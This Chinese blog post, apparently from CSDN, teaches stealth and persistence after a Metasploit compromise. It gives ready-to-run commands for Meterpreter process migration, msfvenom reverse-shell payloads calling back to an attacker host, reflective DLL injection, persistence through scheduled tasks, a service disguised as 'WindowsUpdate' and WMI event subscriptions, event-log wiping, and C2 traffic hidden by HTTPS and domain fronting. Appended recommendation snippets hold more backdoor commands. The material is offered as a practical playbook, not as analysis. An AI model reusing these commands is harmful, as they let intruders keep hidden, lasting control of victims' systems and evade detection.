一文搞懂MSF后渗透免杀:从持久化到深度隐藏

已于 2025-03-09 11:38:43 修改
阅读量625 收藏 10
点赞数 10
分类专栏: 黑客必学! 文章标签: 网络安全
于 2025-03-09 11:04:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lshen12345678/article/details/146128987
版权

目录

一、核心逻辑:后期免杀的三大目标

二、进程隐藏与注入技术

三、持久化驻留方案

四、流量伪装与加密

五、对抗EDR与行为检测

在成功利用MSFvenom生成免杀载荷并获取目标权限后,如何长期维持控制并规避高级检测(如EDR、流量审计)成为关键。本文聚焦后渗透阶段的免杀技术,涵盖进程隐藏、权限维持、流量伪装等实战策略。

一、核心逻辑:后期免杀的三大目标

  1. 隐蔽进程:避免恶意进程暴露在任务管理器或进程监控工具中。

  2. 持久化驻留:确保目标重启后仍能重新连接。

  3. 流量伪装:加密或混淆通信数据,绕过网络层检测。

二、进程隐藏与注入技术

  1. 进程迁移(Migration)
    将Meterpreter会话迁移到系统可信进程(如explorer.exesvchost.exe),隐藏活动痕迹。

    # 自动迁移到指定进程
set AutoRunScript migrate -n explorer.exe
# 手动迁移(在meterpreter会话中)
migrate <PID>

  2. 反射型DLL注入(Reflective DLL Injection)
    直接将恶意代码注入内存执行,不落盘、无文件特征。

    # 生成反射型DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll -o payload.dll
# 注入目标进程
use post/windows/manage/reflective_dll_inject
set DLL /path/to/payload.dll
set PID <目标进程PID>
run

  3. 傀儡进程(Process Hollowing)
    创建合法进程的挂起实例,替换其内存为恶意代码。
    工具推荐:使用Cobalt Strike或自定义PE加载器实现。

三、持久化驻留方案

  1. 计划任务(Scheduled Task)
    利用Windows计划任务定期触发Payload。

    # Meterpreter中创建计划任务
schtasks /create /tn "UpdateService" /tr "C:\Windows\Temp\payload.exe" /sc hourly /mo 1
# 清除痕迹
clearev

  2. 服务安装(Service Installation)
    注册恶意程序为系统服务,实现开机自启。

    # 生成服务型Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp [...] -f exe-service -o svchost_backdoor.exe
# 安装服务
sc create "WindowsUpdate" binPath= "C:\Windows\Temp\svchost_backdoor.exe" start= auto
sc start "WindowsUpdate"

  3. WMI事件订阅
    通过WMI事件(如用户登录、系统启动)触发Payload。

    # 创建WMI事件过滤器与消费者
$filter = Set-WmiInstance -Class __EventFilter -Arguments @{EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$consumer = Set-WmiInstance -Class CommandLineEventConsumer -Arguments @{Name='SysMonitor'; CommandLineTemplate='cmd.exe /c "C:\Windows\Temp\payload.exe"'}
Set-WmiInstance -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}
四、流量伪装与加密

  1. 协议伪装
    使用reverse_httpsreverse_winhttp协议,模拟浏览器或系统更新流量。

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=443 [...] -o https_payload.exe
# 监听时配置SSL证书
set HandlerSSLCert /path/to/cert.pem
set StagerVerifySSLCert true

  2. 域前置(Domain Fronting)
    利用CDN域名(如Cloudflare)隐藏真实C2服务器。

    set HttpHostHeader cdn.example.com
set HttpReferer https://www.google.com/

  3. 流量加密
    在Meterpreter会话中启用SSL/TLS加密通信:

    # 生成SSL证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout key.pem -out cert.pem
# 监听时加载证书
set SSL true
set SSLCert /path/to/cert.pem
set SSLVerifyMode NONE
五、对抗EDR与行为检测

  1. 内存规避(Memory Evasion)
    使用in-memory执行技术,避免敏感API调用(如VirtualAllocCreateThread)。
    *工具

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6111
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2982
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
渗透测试随笔
qq_44749590的博客
05-31 524
Linux命令: exit查看防火墙:netsh advfirewall show allprofile state 开/关防火墙:netsh advfirewall set allprofile state on/off 查询用户:net user 添加用户:net user wxq 123456 /add 查看本地组:net localgroup 查看组用户:net localgroup administrators 持久化后门(msfconsole): run persistence -U -..
渗透之——Metasploit访问控制的持久化
冰河的专栏
01-12 3528
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86358463 工具:Metasploit 为了实现这一点,可以选择在目标计算机上添加一个新的用户,也可以选择使用MSF中persistence模块。 运行persistence模块可以通过在目标计算机上安装一个永久性的后门来实现访问控制的持久化。这样,即使有一天目标计算机修...
metasploit framework的一些使用姿势(持续更新)
闵行小鱼塘
05-15 2030
记录一些metasploit的使用姿势
【kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
09-27 1930
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
渗透测试之流程简述
2301_80127209的博客
12-21 113
渗透测试分为和黑盒测试,我们只知道该网站的URLNmap:一款功能强大的网络扫描和主机检测工具,可以用于收集信息、枚举、漏洞探测和安全扫描。Wireshark:一款抓包和分析网络流量的工具,可以用于监控和调试网络通信。Goby:一款新型的漏洞扫描平台,可以快速发现并利用各种漏洞,还可以联动其他工具如Xray和MSF。22——>ssh弱口令80——>HTTP服务873——>rsync 未授权访问漏洞3306——>mysql弱口令6379——>redis未授权访问漏洞。
Linux安全深度剖析:隐藏木马进程与痕迹清理技术指南
weixin_43822401的博客
05-21 1317
通过上述步骤,你可以在Linux系统中隐藏木马程序进程,使其在常规的进程查看工具中不可见。这种技术在渗透测试中非常有用,但也可能被用于恶意目的,因此使用时需要严格遵守法律和道德规范。
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1497
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
metasploit控制持久化
天元喜羊羊的博客
04-27 4716
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpre
利用metasploit渗透测试制作隐藏后门
wr456wr的博客
03-12 777
利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168.47.129 使用nmap对其进行开放端口探测 在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞 [+] 192.168.47.129:445 - Host is likely VULNERABLE t
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4339
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
MSF笔记(一)
Recar的博客
07-15 4308
这几天又学习了下神器,做了下笔记。Kali linux 下 启动 msfconsole启动数据库 Service postgresql start 查看 Service postgresql statusmsf > service postgressql start [*] exec: service postgressql startHelp帮助创建一个工作台 Workspace
利用Metasploit建立持续性会话后门
大方子
09-13 1万+
    环境Kali 1.0 IP:192.168.0.7windows 2003 IP:192.168.0.128本次文章 讲解Metasploit维持会话 建立服务后门首先先来生成一个 msf的exe后门     msf &gt; msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test....
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 10万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
Meterpreter 建立持久后门 backdoor
盗才生的博客
05-06 1万+
安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 609628 bytes long RunningPersistance Script Resource filefor cleanup created at /root/.msf4/logs/
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6366
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
的N种姿势-msf
m0_51268003的博客
04-02 4691
msf是什么?百度一下你就知道 常规参数 -p / -payload 指定payload 支持自定义payload -l / -list 指出攻击模块(payloads、encoders、nops、all)的可用资源 -n / nopsled 为payload预设一个NOP滑动长度 //NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(1...
Meterpreter 控制持久化
Epsilon
03-01 6425
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值